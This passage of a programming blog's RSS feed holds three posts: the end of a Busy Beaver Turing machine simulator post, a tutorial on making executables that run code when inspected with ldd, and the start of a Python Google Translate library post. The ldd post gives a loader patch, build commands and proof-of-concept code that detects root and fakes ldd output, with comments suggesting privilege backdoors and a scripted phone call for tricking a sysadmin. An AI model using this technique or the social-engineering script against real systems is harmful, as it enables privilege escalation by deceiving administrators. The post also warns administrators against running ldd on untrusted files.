    tm = TuringMachine(program, &#39;a&#39;, &#39;h&#39;, &#39;0&#39;)
    tm.set_tape_callback(tape_callback)
    tm.run()
    print &#34;Busy beaver finished in %d steps.&#34; % tm.moves

def usage():
    print &#34;Usage: %s [1|2|3|4|5|6]&#34; % sys.argv[0]
    print &#34;Runs Busy Beaver problem for 1 or 2 or 3 or 4 or 5 or 6 states.&#34;
    sys.exit(1)

if __name__ == &#34;__main__&#34;:
    if len(sys.argv[1:]) &lt; 1:
        usage()

    n = int(sys.argv[1])

    if n &lt; 1 or n &gt; 6:
        print &#34;n must be between 1 and 6 inclusive&#34;
        print
        usage()

    busy_beaver(n)
</pre>
<p>I rewrote the Turing Machine simulator in C++ and the speedup was huge. Now it took 14 seconds to execute the same Busy Beaver 5.</p>
<p>Download: <a href="http://www.catonmat.net/download/busy_beaver.cpp">busy_beaver.cpp</a> (153)</p>
<pre class="lotsocode">
/*
** Turing Machine simulator for Busy Beaver problem.
** Version 1.0
*/

#include &lt;cstdlib&gt;
#include &lt;iostream&gt;
#include &lt;utility&gt;
#include &lt;vector&gt;
#include &lt;string&gt;
#include &lt;map&gt;

using namespace std;

typedef vector&lt;char&gt; Tape;
typedef map&lt;string, string&gt; Program;

class TuringMachine {
private:
    Tape tape;
    Program program;
    char start, halt, init, state;
    bool tape_changed;
    int moves;
    int pos;
public:
    TuringMachine(Program program, char start, char halt, char init):
        tape(1, init), program(program), start(start), halt(halt),
        init(init), state(start), moves(0), tape_changed(1), pos(0)
    { }

    void run() {
        while (state != halt) {
            print_tape();
            string lhs = get_lhs();
            string rhs = get_rhs(lhs);

            char new_state = rhs[0];
            char new_symbol = rhs[1];
            char move = rhs[2];

            char old_symbol = lhs[1];
            update_tape(old_symbol, new_symbol);
            update_state(new_state);
            move_head(move);
        }
        print_tape();
    }

    int get_moves() {
        return moves;
    }

private:
    inline void print_tape() {
        if (tape_changed) {
            for (int i=0; i&lt;tape.size(); i++)
                cout &lt;&lt; tape[i];
            cout &lt;&lt; endl;
        }
    }

    inline string get_lhs() {
        char sp[3] = {0};
        sp[0] = state;
        sp[1] = tape[pos];
        return string(sp);
    }

    inline string get_rhs(string &#038;lhs) {
        return program[lhs];
    }

    inline void update_tape(char old_symbol, char new_symbol) {
        if (old_symbol != new_symbol) {
            tape[pos] = new_symbol;
            tape_changed++;
        }
        else {
            tape_changed = 0;
        }
    }

    inline void update_state(char new_state) {
        state = new_state;
    }

    inline void move_head(char move) {
        if (move == &#39;l&#39;)
            pos -= 1;
        else if (move == &#39;r&#39;)
            pos += 1;
        else
            throw string(&#34;unknown state&#34;);

        if (pos &lt; 0) {
            tape.insert(tape.begin(), init);
            pos = 0;
        }
        if (pos &gt;= tape.size()) {
            tape.push_back(init);
        }
        moves++;
    }

};

vector&lt;Program&gt; busy_beavers;

void init_bb6()
{
    Program bb6;
    bb6.insert(make_pair(&#34;a0&#34;, &#34;b1r&#34;));
    bb6.insert(make_pair(&#34;b0&#34;, &#34;c1l&#34;));
    bb6.insert(make_pair(&#34;c0&#34;, &#34;d1l&#34;));
    bb6.insert(make_pair(&#34;d0&#34;, &#34;e1l&#34;));
    bb6.insert(make_pair(&#34;e0&#34;, &#34;a1l&#34;));
    bb6.insert(make_pair(&#34;f0&#34;, &#34;e1l&#34;));

    bb6.insert(make_pair(&#34;a1&#34;, &#34;e0l&#34;));
    bb6.insert(make_pair(&#34;b1&#34;, &#34;a0r&#34;));
    bb6.insert(make_pair(&#34;c1&#34;, &#34;c0r&#34;));
    bb6.insert(make_pair(&#34;d1&#34;, &#34;f0l&#34;));
    bb6.insert(make_pair(&#34;e1&#34;, &#34;c1l&#34;));
    bb6.insert(make_pair(&#34;f1&#34;, &#34;h1r&#34;));

    busy_beavers.push_back(bb6);
}

void init_bb5()
{
    Program bb5;
    bb5.insert(make_pair(&#34;a0&#34;, &#34;b1l&#34;));
    bb5.insert(make_pair(&#34;b0&#34;, &#34;c1r&#34;));
    bb5.insert(make_pair(&#34;c0&#34;, &#34;a1l&#34;));
    bb5.insert(make_pair(&#34;d0&#34;, &#34;a1l&#34;));
    bb5.insert(make_pair(&#34;e0&#34;, &#34;h1r&#34;));

    bb5.insert(make_pair(&#34;a1&#34;, &#34;a1l&#34;));
    bb5.insert(make_pair(&#34;b1&#34;, &#34;b1r&#34;));
    bb5.insert(make_pair(&#34;c1&#34;, &#34;d1r&#34;));
    bb5.insert(make_pair(&#34;d1&#34;, &#34;e1r&#34;));
    bb5.insert(make_pair(&#34;e1&#34;, &#34;c0r&#34;));

    busy_beavers.push_back(bb5);
}

void init_bb4()
{
    Program bb4;
    bb4.insert(make_pair(&#34;a0&#34;, &#34;b1r&#34;));
    bb4.insert(make_pair(&#34;b0&#34;, &#34;a1l&#34;));
    bb4.insert(make_pair(&#34;c0&#34;, &#34;h1r&#34;));
    bb4.insert(make_pair(&#34;d0&#34;, &#34;d1r&#34;));

    bb4.insert(make_pair(&#34;a1&#34;, &#34;b1l&#34;));
    bb4.insert(make_pair(&#34;b1&#34;, &#34;c0l&#34;));
    bb4.insert(make_pair(&#34;c1&#34;, &#34;d1l&#34;));
    bb4.insert(make_pair(&#34;d1&#34;, &#34;a0r&#34;));

    busy_beavers.push_back(bb4);

}

void init_bb3()
{
    Program bb3;
    bb3.insert(make_pair(&#34;a0&#34;, &#34;b1r&#34;));
    bb3.insert(make_pair(&#34;b0&#34;, &#34;c0r&#34;));
    bb3.insert(make_pair(&#34;c0&#34;, &#34;c1l&#34;));

    bb3.insert(make_pair(&#34;a1&#34;, &#34;h1r&#34;));
    bb3.insert(make_pair(&#34;b1&#34;, &#34;b1r&#34;));
    bb3.insert(make_pair(&#34;c1&#34;, &#34;a1l&#34;));

    busy_beavers.push_back(bb3);
}

void init_bb2()
{
    Program bb2;
    bb2.insert(make_pair(&#34;a0&#34;, &#34;b1r&#34;));
    bb2.insert(make_pair(&#34;b0&#34;, &#34;a1l&#34;));

    bb2.insert(make_pair(&#34;a1&#34;, &#34;b1l&#34;));
    bb2.insert(make_pair(&#34;b1&#34;, &#34;h1r&#34;));

    busy_beavers.push_back(bb2);
}

void init_bb1()
{
    Program bb1;
    bb1.insert(make_pair(&#34;a0&#34;, &#34;h1r&#34;));

    busy_beavers.push_back(bb1);
}

void init_busy_beavers()
{
    busy_beavers.push_back(Program());
    init_bb1();
    init_bb2();
    init_bb3();
    init_bb4();
    init_bb5();
    init_bb6();
}

void busy_beaver(int n)
{
    cout &lt;&lt; &#34;Running Busy Beaver with &#34; &lt;&lt; n &lt;&lt; &#34; states.&#34; &lt;&lt; endl;
    TuringMachine tm(busy_beavers[n], &#39;a&#39;, &#39;h&#39;, &#39;0&#39;);
    tm.run();
    cout &lt;&lt; &#34;Busy Beaver finished in &#34; &lt;&lt; tm.get_moves() &lt;&lt; &#34; steps.&#34; &lt;&lt; endl;
}

void usage(const char *prog)
{
    cout &lt;&lt; &#34;Usage: &#34; &lt;&lt; prog &lt;&lt; &#34; [1|2|3|4|5|6]\n&#34;;
    cout &lt;&lt; &#34;Runs Busy Beaver problem for 1 or 2 or 3 or 4 or 5 or 6 states.&#34; &lt;&lt; endl;
    exit(1);
}

int main(int argc, char **argv)
{
    if (argc &lt; 2) {
        usage(argv[0]);
    }

    int n = atoi(argv[1]);
    if (n &lt; 1 || n &gt; 6) {
        cout &lt;&lt; &#34;n must be between 1 and 6 inclusive!\n&#34;;
        cout &lt;&lt; &#34;\n&#34;;
        usage(argv[0]);
    }

    init_busy_beavers();
    busy_beaver(n);
}
</pre>
<p>And I also wrote a Perl program that uses the GD library to draw the tape changes on Turing Machines.</p>
<p>Download: <a href="http://www.catonmat.net/download/draw_turing_machine.perl">draw_turing_machine.perl</a> (103)</p>
<pre class="lotsocode">
#!/usr/bin/perl
#
# Given output from busy_beaver.py or busy_beaver.cpp,
# draws the turing machine tape changes.
#

use warnings;
use strict;
use GD;

$|++;

my $input_file = shift or die &#39;Usage: $0 &lt;file with TM state transitions&gt;&#39;;
my $cell_size = shift || 4;
my $im_file = &#34;$input_file.png&#34;;

sub line_count {
    my $count = 0;
    open my $fh, &#39;&lt;&#39;, shift or die $!;
    $count += tr/\n/\n/ while sysread($fh, $_, 2**20);
    return $count;
}

sub get_last_line {
    my $file = shift;
    my $last_line = `tail -1 $file`;
    chomp $last_line;
    return $last_line;
}

my $nr_lines = line_count $input_file;
my $last_line = get_last_line $input_file;
my $last_width = length($last_line);

my ($width, $height) = ($cell_size*$last_width, $cell_size*$nr_lines);

my $im = GD::Image-&gt;new($width, $height);
my $white = $im-&gt;colorAllocate(255,255,255);
my $dark = $im-&gt;colorAllocate(40, 40, 40);

my ($x, $y) = (0, $height-$cell_size);

print &#34;Starting to draw the image. Total states: $nr_lines.\n&#34;;
print &#34;It will be $width x $height pizels in size.\n&#34;;

my $prev_line;
my ($pad_left, $pad_right) = (0, 0);

sub pad {
    my ($line, $left, $right) = @_;
    return &#39;0&#39;x$left . $line . &#39;0&#39;x$right;
}

open my $fh, &#34;-|&#34;, &#34;/usr/bin/tac $input_file&#34; or die $!;
while (&lt;$fh&gt;) {
    chomp;
    print &#34;.&#34; if $. % 10 == 0;
    print &#34;($.)&#34; if $. % 500 == 0;

    $prev_line = $_ unless defined $prev_line;

    my $new_line;
    if (length $_ != length $prev_line) {
        if ($prev_line =~ /0$/) {
            $pad_right++;
        }
        elsif ($prev_line =~ /^0/) {
            $pad_left++;
        }
        else {
            die &#34;unexpected data at $. in file $input_file&#34;;
        }
    }
    $new_line = pad($_, $pad_left, $pad_right);
    $prev_line = $_;

    my @cells = split //, $new_line;
    for my $cell (@cells) {
        $im-&gt;filledRectangle($x, $y, $x + $cell_size, $y + $cell_size,
                $cell ? $dark : $white);
        $x += $cell_size;
    }
    $y -= $cell_size;
    $x = 0;

}

print &#34;\n&#34;;

{
    open my $fh, &#34;&gt;&#34;, $im_file or die $!;
    print $fh $im-&gt;png;
    close $fh;
}

print &#34;Done. Image saved to $im_file.\n&#34;;
</pre>
<p>You can play with these programs yourself. Here is how. Run &#8220;busy_beaver.py &lt;n&gt;&#8221; with n=1,2,3,4,5,6. This will run the n-state busy beaver Turing Machine. The output will be the tape changes. Then use &#8220;draw_turing_machine.pl&#8221; to visualize the tape changes.</p>
<p>For example:</p>
<pre>
$ busy_beaver.py 4 > bb4
$ draw_turing_machine.pl bb4
</pre>
<p>There are variations of this problem. For example, the busiest beaver with 3 and more symbols. See &#8220;<a href="http://www.logique.jussieu.fr/~michel/bbc.html">The Busy Beaver Competition</a>&#8221; for these. The historical development is also interesting &#8212; see <a href="http://www.logique.jussieu.fr/~michel/ha.html">The Busy Beaver Historical Survey</a> for more info.</p>
<p>I first learned about the Busy Beaver problem from a book called &#8220;<a href="http://www.amazon.com/dp/0805071660?tag=catonmat-20">The New Turing Omnibus</a>.&#8221; It contains 66 different essays on various computer science subjects such as algorithms, turing machines, grammars, computability, randomness, and other fun topics. These essays are written in an accessible style that even a high school student can understand them. Each essay doesn&#8217;t take more than 10 minutes to read. I recommend this book. Get it here:</p>
<div class="center-aligner">
<iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&#038;bc1=000000&#038;IS2=1&#038;bg1=FFFFFF&#038;fc1=000000&#038;lc1=0000FF&#038;t=catonmat-20&#038;o=1&#038;p=8&#038;l=as1&#038;m=amazon&#038;f=ifr&#038;md=10FE9736YVPPT7A0FBG2&#038;asins=0805071660" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
</div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=OOwhMbyanxE:oNJ3lSIDoIY:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=OOwhMbyanxE:oNJ3lSIDoIY:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=OOwhMbyanxE:oNJ3lSIDoIY:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=OOwhMbyanxE:oNJ3lSIDoIY:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=OOwhMbyanxE:oNJ3lSIDoIY:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=OOwhMbyanxE:oNJ3lSIDoIY:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=OOwhMbyanxE:oNJ3lSIDoIY:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/OOwhMbyanxE" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/busy-beaver/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/busy-beaver/</feedburner:origLink></item>
		<item>
		<title>ldd arbitrary code execution</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/nPBz088G5cQ/</link>
		<comments>http://www.catonmat.net/blog/ldd-arbitrary-code-execution/#comments</comments>
		<pubDate>Mon, 26 Oct 2009 04:15:52 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Security]]></category>
<category>arbitrary code execution</category><category>exploit</category><category>gcc</category><category>ld linux</category><category>ld uclibc</category><category>ldd</category><category>ld trace loaded objects</category><category>linker</category><category>linux</category><category>loader</category><category>malicious</category><category>patch</category><category>social engineering</category><category>sysadmin</category><category>uclibc</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/ldd-arbitrary-code-execution/</guid>
		<description><![CDATA[The `ldd` utility is more vulnerable than you think. It&#8217;s frequently used by programmers and system administrators to determine the dynamic library dependencies of executables. Sounds pretty innocent, right? Wrong!
In this article I am going to show you how to create an executable that runs arbitrary code if it&#8217;s examined by `ldd`. I have also [...]]]></description>
			<content:encoded><![CDATA[<p>The `ldd` utility is more vulnerable than you think. It&#8217;s frequently used by programmers and system administrators to determine the dynamic library dependencies of executables. Sounds pretty innocent, right? Wrong!</p>
<p>In this article I am going to show you how to create an executable that runs arbitrary code if it&#8217;s examined by `ldd`. I have also written a social engineering scenario on how you can get your sysadmin to unknowingly hand you his privileges.</p>
<p>I researched this subject thoroughly and found that it&#8217;s almost completely undocumented. I have no idea how this could have gone unnoticed for such a long time. Here are the only few documents that mention this interesting behavior: <a href="http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html">1</a>, <a href="http://www.mail-archive.com/debian-glibc@lists.debian.org/msg39907.html">2</a>, <a href="http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514408">3</a>, <a href="http://reverse.lostrealm.com/protect/ldd.html">4</a>.</p>
<p>First let&#8217;s understand how `ldd` works. Take a look at these three examples:</p>
<pre>
[1] $ <strong>ldd /bin/grep</strong>
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7eca000)
        /lib/ld-linux.so.2 (0xb801e000)

[2] $ <strong>LD_TRACE_LOADED_OBJECTS=1 /bin/grep</strong>
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7e30000)
        /lib/ld-linux.so.2 (0xb7f84000)

[3] $ <strong>LD_TRACE_LOADED_OBJECTS=1 /lib/ld-linux.so.2 /bin/grep</strong>
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/libc.so.6 (0xb7f7c000)
        /lib/ld-linux.so.2 (0xb80d0000)
</pre>
<p>The first command [1] runs `ldd` on `/bin/grep`. The output is what we expect &#8212; a list of dynamic libraries that `/bin/grep` depends on.</p>
<p>The second command [2] sets the LD_TRACE_LOADED_OBJECTS environment variable and seemingly executes `/bin/grep` (but not quite). Surprisingly the output is the same!</p>
<p>The third command [3] again sets the LD_TRACE_LOADED_OBJECTS environment variable, calls the dynamic linker/loader `ld-linux.so` and passes `/bin/grep` to it as an argument. The output is again the same!</p>
<p><strong>What&#8217;s going on here?</strong></p>
<p>It turns out that `ldd` is nothing more than a wrapper around the 2nd and 3rd command. In the 2nd and 3rd example `/bin/grep` was never run. That&#8217;s a peculiarity of the GNU dynamic loader. If it notices the LD_TRACE_LOADED_OBJECTS environment variable, it never executes the program, it outputs the list of dynamic library dependencies and quits. (On BSD `ldd` is a C program that does the same.)</p>
<p>If you are on Linux, take a look at the `ldd` executable. You&#8217;ll find that it&#8217;s actually a bash script. If you step through it very carefully, you&#8217;ll notice that the 2nd command gets executed if the program specified to `ldd` can&#8217;t be loaded by the `ld-linux.so` loader, and that the 3rd command gets executed if it can.</p>
<p>One particular case when a program won&#8217;t be handled by `ld-linux.so` is when it has a different loader than the system&#8217;s default specified in it&#8217;s .interp ELF section. That&#8217;s the whole idea in executing arbitrary code with `ldd` &#8212; load the executable via a different loader that does not handle LD_TRACE_LOADED_OBJECTS environment variable but instead executes the program.</p>
<p>For example, you can put a malicious executable in ~/app/bin/exec and have it loaded by ~/app/lib/loader.so. If someone does `ldd /home/you/app/bin/exec` then it&#8217;s game over for them. They just ran the nasty code you had put in your executable. You can do some social engineering to get the sysadmin to execute `ldd` on your executable allowing you to gain the control over the box.</p>
<p><strong>Compiling the new loader.</strong></p>
<p>Get the <a href="http://www.uclibc.org/">uClibc</a> C library. It has pretty code and can be easily patched to bypass the LD_TRACE_LOADED_OBJECTS checks.</p>
<pre>
$ mkdir app
$ cd app
app$ wget 'http://www.uclibc.org/downloads/uClibc-0.9.30.1.tar.bz2'
</pre>
<p>Unpack it and run `make menuconfig`, choose the target architecture (most likely i386), leave everything else unchanged.</p>
<pre>
app$ bunzip2 < uClibc-0.9.30.1.tar.bz2 | tar -vx
app$ rm -rf uClibc-0.9.30.1.tar.bz2
app$ cd uClibc-0.9.30.1
app/uClibc-0.9.30.1$ make menuconfig
</pre>
<p>Edit .config and set the destination install directory to `/home/you/app/uclibc`.</p>
<pre>
# change these two lines
RUNTIME_PREFIX="/usr/$(TARGET_ARCH)-linux-uclibc/"
DEVEL_PREFIX="/usr/$(TARGET_ARCH)-linux-uclibc/usr/"

# to this
RUNTIME_PREFIX="/home/you/app/uclibc/"
DEVEL_PREFIX="/home/you/app/uclibc/usr/"
</pre>
<p>Now we&#8217;ll need to patch it to bypass LD_TRACE_LOADED_OBJECTS check.</p>
<p>Here is the patch. It patches the `ldso/ldso/ldso.c` file. Save the patch to a file and run `patch -p0 < file`. If you don't do it, arbitrary code execution won't work, because it will think that `ldd` wants to list dependencies.</p>
<pre>
--- ldso/ldso/ldso-orig.c       2009-10-25 00:27:12.000000000 +0300
+++ ldso/ldso/ldso.c    2009-10-25 00:27:22.000000000 +0300
@@ -404,9 +404,11 @@
        }
 #endif

+    /*
        if (_dl_getenv("LD_TRACE_LOADED_OBJECTS", envp) != NULL) {
                trace_loaded_objects++;
        }
+    */

 #ifndef __LDSO_LDD_SUPPORT__
        if (trace_loaded_objects) {
</pre>
<p>Now compile and install it.</p>
<pre>
app/uClibc-0.9.30.1$ make -j 4
app/uClibc-0.9.30.1$ make install
</pre>
<p>This will install the uClibc loader and libc library to /home/you/app/uclibc.</p>
<p>That&#8217;s it. We have now installed uClibc. All we have to do now is link our executable with uClibc&#8217;s loader (app/lib/ld-uClibc.so.0). It will execute the code if run under `ldd`!</p>
<p><strong>Creating and linking an executable with uClibc&#8217;s loader.</strong></p>
<p>First let&#8217;s create a test application that will just print something when executed via `ldd` and let&#8217;s put it in `app/bin/myapp`</p>
<pre>
app/uClibc-0.9.30.1$ cd ..
app$ mkdir bin
app$ cd bin
app/bin$ vim myapp.c
</pre>
<p>Let&#8217;s write the following in `myapp.c`.</p>
<pre>
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;

int main() {
  if (getenv(&#34;LD_TRACE_LOADED_OBJECTS&#34;)) {
    printf("All your box are belong to me.\n");
  }
  else {
    printf("Nothing.\n");
  }
  return 0;
}
</pre>
<p>This is the most basic code. It checks if LD_TRACE_LOADED_OBJECTS env variable is set or not. If the variable set, the program acts maliciously but if it&#8217;s not, the program acts as if nothing happened.</p>
<p>The compilation is somewhat complicated because we have to link with the new C library statically (because anyone who might execute our program via `ldd` will not have our new C library in their LD_LIBRARY_PATH) and specify the new loader:</p>
<pre>
app/bin$ L=/home/you/app/uclibc
app/bin$ gcc -Wl,&#45;&#45;dynamic-linker,$L/lib/ld-uClibc.so.0 \
    -Wl,-rpath-link,$L/lib \
    -nostdlib \
    myapp.c -o myapp \
    $L/usr/lib/crt*.o \
    -L$L/usr/lib/ \
    -lc
</pre>
<p>Here is the explanation of options passed to gcc:</p>
<ul>
<li><strong>-Wl,&#45;&#45;dynamic-linker,$L/lib/ld-uClibc.so.0</strong> &#8212; specifies the new loader,</li>
<li><strong>-Wl,-rpath-link,$L/lib</strong> &#8212; specifies the primary directory where the dynamic loader will look for dependencies,</li>
<li><strong>-nostdlib</strong> &#8212; don&#8217;t use system libraries,</li>
<li><strong>myapp.c -o myapp</strong> &#8212; compile myapp.c to executable myapp,</li>
<li><strong>$L/usr/lib/crt*.o</strong> &#8212; statically link to initial runtime code, function prolog, epilog,</li>
<li><strong>-L$L/usr/lib/</strong> &#8212; search for libc in this directory,</li>
<li><strong>-lc</strong> &#8212; link with the C library.</li>
</ul>
<p>Now let&#8217;s run the new `myapp` executable. First, without ldd:</p>
<pre>
app/bin$ ./myapp
Nothing.
</pre>
<p>LD_TRACE_LOADED_OBJECTS environment variable was not set and the program output &#8220;Nothing.&#8221; as expected.</p>
<p>Now let&#8217;s run it via `ldd` and for the maximum effect, let&#8217;s run it from the root shell, as if I was the sysadmin:</p>
<pre>
app/bin$ su
Password:
app/bin# ldd ./myapp
<strong>All your box are belong to me.</strong>
</pre>
<p>Wow! The sysadmin just executed our exploit! He lost the system.</p>
<p><strong>A more sophisticated example.</strong></p>
<p>Here is a more sophisticated example that I just came up with. When run without `ldd` this application fails with a fictitious &#8220;error while loading shared libraries&#8221; error. When run under `ldd` it checks if the person is root, and owns the box. After that it fakes `ldd` output and pretends to have `libat.so.0` missing.</p>
<p>This code needs a lot of improvements and just illustrates the main ideas.</p>
<pre class="lotsocode">
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/types.h&gt;

/*
This example pretends to have a fictitious library &#39;libat.so.0&#39; missing.
When someone with root permissions runs `ldd this_program`, it does
something nasty in malicious() function.

I haven&#39;t implemented anything malicious but have written down some ideas
of what could be done.

This is, of course, a joke program. To make it look more real, you&#39;d have
to bump its size, add some more dependencies, simulate trying to open the
missing library, detect if ran under debugger or strace and do absolutely
nothing suspicious, etc.
*/

void pretend_as_ldd()
{
    printf(&#34;\tlinux-gate.so.1 =&gt;  (0xffffe000)\n&#34;);
    printf(&#34;\tlibat.so.0 =&gt; not found\n&#34;);
    printf(&#34;\tlibc.so.6 =&gt; /lib/libc.so.6 (0xb7ec3000)\n&#34;);
    printf(&#34;\t/lib/ld-linux.so.2 (0xb8017000)\n&#34;);
}

void malicious()
{
    if (geteuid() == 0) {
        /* we are root ... */
        printf(&#34;poof, all your box are belong to us\n&#34;);

        /* silently add a new user to /etc/passwd, */
        /* or create a suid=0 program that you can later execute, */
        /* or do something really nasty */
    }
}

int main(int argc, char **argv)
{
    if (getenv(&#34;LD_TRACE_LOADED_OBJECTS&#34;)) {
        malicious();
        pretend_as_ldd();
        return 0;
    }

    printf(&#34;%s: error while loading shared libraries: libat.so.0: &#34;
           &#34;cannot open shared object file: No such file or directory\n&#34;,
           argv[0]);
    return 127;
}
</pre>
<p>Actually you can put the code you want to get executed right in the loader itself. This way the executable will always look clean.</p>
<p><strong>Social engineering.</strong></p>
<p>Most system administrators probably don&#8217;t know that they should never run `ldd` on unfamiliar executables.</p>
<p>Here is a fake scenario on how to get your sysadmin run `ldd` on your executable.</p>
<p>Sysadmin&#8217;s phone: <em>ring, ring</em>.</p>
<p>Sysadmin: &#8220;Mr. sysadmin here. How can I help you?&#8221;</p>
<p>You: &#8220;Hi. An app that I have been using has started misbehaving. I am getting weird dependency errors. Could you see what is wrong?&#8221;</p>
<p>Sysadmin: &#8220;Sure. What app is it?&#8221;</p>
<p>You: &#8220;It&#8217;s in my home directory, /home/carl/app/bin/myapp. Sometimes when I run it, it says something about &#8216;error while loading shared libraries&#8217;.&#8221;</p>
<p>Sysadmin: &#8220;Just a sec.&#8221; <em>noise from keyboard in the background</em></p>
<p>Sysadmin: &#8220;What was it again? It must be some kind of a library problem. I am going to check its dependencies.&#8221;</p>
<p>You: &#8220;Thanks, it&#8217;s /home/carl/app/bin/myapp.&#8221;</p>
<p>Sysadmin: &#8220;Hmm. It says it&#8217;s missing `libat.so.0`, ever heard of it?&#8221;</p>
<p>You: &#8220;Nope, no idea&#8230; I really need to get my work done, can you check on that and get back to me?&#8221; <em>evil grin in the background</em></p>
<p>Sysadmin: &#8220;Okay Carl, I&#8217;m gonna call you back.&#8221;</p>
<p>You: &#8220;Thanks! See ya.&#8221;</p>
<p>You: `mv ~/.hidden/working_app ~/app/bin/myapp`.</p>
<p><em>After a while.</em></p>
<p>Sysadmin calls: &#8220;Hi. It seems to be working now. I don&#8217;t know what the problem was.&#8221;</p>
<p>You: &#8220;Oh, okay. Thanks!&#8221;</p>
<p><strong>Lesson to be learned: Never run `ldd` on unknown executables!</strong></p>
<p>P.S. If you enjoyed this article <a href="http://www.catonmat.net/feed/">subscribe to my future posts</a>! I have many more quality articles coming.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=nPBz088G5cQ:_L8cia15m8Y:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=nPBz088G5cQ:_L8cia15m8Y:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=nPBz088G5cQ:_L8cia15m8Y:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=nPBz088G5cQ:_L8cia15m8Y:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=nPBz088G5cQ:_L8cia15m8Y:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=nPBz088G5cQ:_L8cia15m8Y:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=nPBz088G5cQ:_L8cia15m8Y:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/nPBz088G5cQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/ldd-arbitrary-code-execution/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/ldd-arbitrary-code-execution/</feedburner:origLink></item>
		<item>
		<title>Python Library for Google Translate</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/B6OzK59Xt4E/</link>
		<comments>http://www.catonmat.net/blog/python-library-for-google-translate/#comments</comments>
		<pubDate>Mon, 28 Sep 2009 05:00:12 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Programming]]></category>
<category>ajax</category><category>detect</category><category>google</category><category>languagedetector</category><category>python</category><category>translate</category><category>translator</category><category>xgoogle</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/python-library-for-google-translate/</guid>
		<description><![CDATA[I have extended my xgoogle library with a Python module for Google Translate.
The new module is called &#8220;xgoogle.translate&#8221; and it implements two classes - &#8220;Translator&#8221; and &#8220;LanguageDetector&#8220;.
The &#8220;Translator&#8221; class can be used to translate text. It provides a function called &#8220;translate&#8221; that takes three arguments - &#8220;message&#8220;, &#8220;lang_from&#8221; and &#8220;lang_to&#8220;. It returns the translated text [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/03/google-python-search-library.jpg' alt='Google Python Search Library' class='post-icon' align='left' />I have extended my <a href="http://www.catonmat.net/blog/python-library-for-google-search/">xgoogle library</a> with a Python module for <a href="http://translate.google.com/">Google Translate</a>.</p>
<p>The new module is called &#8220;<strong>xgoogle.translate</strong>&#8221; and it implements two classes - &#8220;<strong>Translator</strong>&#8221; and &#8220;<strong>LanguageDetector</strong>&#8220;.</p>
<p>The &#8220;Translator&#8221; class can be used to translate text. It provides a function called &#8220;<strong>translate</strong>&#8221; that takes three arguments - &#8220;<strong>message</strong>&#8220;, &#8220;<strong>lang_from</strong>&#8221; and &#8220;<strong>lang_to</strong>&#8220;. It returns the translated text as a Unicode string. Don&#8217;t forget to encode it to the right encoding before outputting, otherwise you&#8217;ll get errors such as &#8220;UnicodeEncodeError: &#8216;latin-1&#8242; codec can&#8217;t encode characters in position 0-3: ordinal not in range(256)&#8221;</p>
<p>Here is an example usage of the &#8220;Translator&#8221; class:</p>
<pre>
>>> from xgoogle.translate import Translator
>>>
>>> translate = Translator().translate
>>>
>>> print translate("Mani sauc Pēteris", lang_to="en")
My name is Peter
>>>
>>> print translate("Mani sauc Pēteris", lang_to="ru").encode('utf-8')
Меня зовут Петр
>>>
>>> print translate("Меня зовут Петр")
My name is Peter
</pre>
<p>If &#8220;lang_from&#8221; is not given, Google&#8217;s translation service auto-detects it. If &#8220;lang_to&#8221; is not given, it defaults to &#8220;<strong>en</strong>&#8221; (English).</p>
<p>In case of an error, the &#8220;translate&#8221; function throws &#8220;<strong>TranslationError</strong>&#8221; exception with a message why the translation failed. It&#8217;s best to wrap calls to &#8220;translate&#8221; in a try/except block:</p>
<pre>

Program:

>>> from xgoogle.translate import Translator, TranslationError
>>>
>>> try:
>>>   translate = Translator().translate
>>>   print translate("")
>>> except TranslationError, e:
>>>   print e

